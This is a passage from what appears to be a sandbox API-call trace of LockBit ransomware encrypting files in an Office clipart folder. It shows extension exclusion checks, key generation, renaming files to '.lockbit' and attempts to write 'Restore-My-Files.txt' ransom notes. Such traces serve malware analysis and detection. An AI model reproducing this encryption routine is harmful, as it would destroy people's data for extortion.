(lpString1=".ini", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107364.WMF") returned 1 [0141.744] lstrcmpiW (lpString1="ntldr", lpString2="J0107364.WMF") returned 1 [0141.744] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107364.WMF") returned 1 [0141.744] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107364.WMF") returned -1 [0141.744] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107364.WMF") returned -1 [0141.744] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107364.WMF") returned 1 [0141.744] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107364.WMF") returned -1 [0141.745] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.745] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF") returned=".WMF" [0141.745] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.745] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.745] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.745] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF.lockbit") returned 72 [0141.745] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107364.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0141.746] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.746] malloc (_Size=0x40068) returned 0x3df0008 [0141.746] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16588) returned 1 [0141.746] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.747] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.747] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.747] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.747] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.752] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.752] malloc (_Size=0xa6) returned 0x77d7a8 [0141.752] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.753] free (_Block=0x77d7a8) [0141.753] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.753] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.754] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.754] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2ce4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107426.WMF", cAlternateFileName="")) returned 1 [0141.754] lstrcmpiW (lpString1=".", lpString2="J0107426.WMF") returned -1 [0141.754] lstrcmpiW (lpString1="..", lpString2="J0107426.WMF") returned -1 [0141.754] PathFindExtensionW (pszPath="J0107426.WMF") returned=".WMF" [0141.754] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.754] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.755] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.755] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107426.WMF") returned 1 [0141.756] lstrcmpiW (lpString1="ntldr", lpString2="J0107426.WMF") returned 1 [0141.756] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107426.WMF") returned 1 [0141.756] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107426.WMF") returned -1 [0141.756] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107426.WMF") returned -1 [0141.756] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107426.WMF") returned 1 [0141.756] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107426.WMF") returned -1 [0141.756] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.756] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF") returned=".WMF" [0141.756] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.756] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.756] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.757] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.757] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.757] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.757] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.757] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.757] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.757] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.757] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF.lockbit") returned 72 [0141.757] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107426.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0141.758] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.758] malloc (_Size=0x40068) returned 0x3df0008 [0141.758] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11492) returned 1 [0141.758] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.758] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.758] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.758] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.759] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.762] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.762] malloc (_Size=0xa6) returned 0x77d7a8 [0141.762] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.764] free (_Block=0x77d7a8) [0141.764] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.764] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.764] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.764] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x563ba0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7680, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107446.WMF", cAlternateFileName="")) returned 1 [0141.764] lstrcmpiW (lpString1=".", lpString2="J0107446.WMF") returned -1 [0141.764] lstrcmpiW (lpString1="..", lpString2="J0107446.WMF") returned -1 [0141.764] PathFindExtensionW (pszPath="J0107446.WMF") returned=".WMF" [0141.764] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.764] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.764] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.764] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.764] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.764] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.764] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.764] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.764] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.765] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.765] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107446.WMF") returned 1 [0141.766] lstrcmpiW (lpString1="ntldr", lpString2="J0107446.WMF") returned 1 [0141.766] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107446.WMF") returned 1 [0141.766] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107446.WMF") returned -1 [0141.766] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107446.WMF") returned -1 [0141.766] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107446.WMF") returned 1 [0141.766] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107446.WMF") returned -1 [0141.766] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.766] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF") returned=".WMF" [0141.766] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.766] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.766] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.767] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.767] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.767] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.767] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.767] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.767] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.767] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.767] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.767] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.767] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.767] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF.lockbit") returned 72 [0141.767] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107446.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0141.768] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.768] malloc (_Size=0x40068) returned 0x3df0008 [0141.768] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=30336) returned 1 [0141.768] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.768] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.768] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.769] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.769] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.788] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.788] malloc (_Size=0xa6) returned 0x77d7a8 [0141.788] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.792] free (_Block=0x77d7a8) [0141.792] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.792] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.792] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft 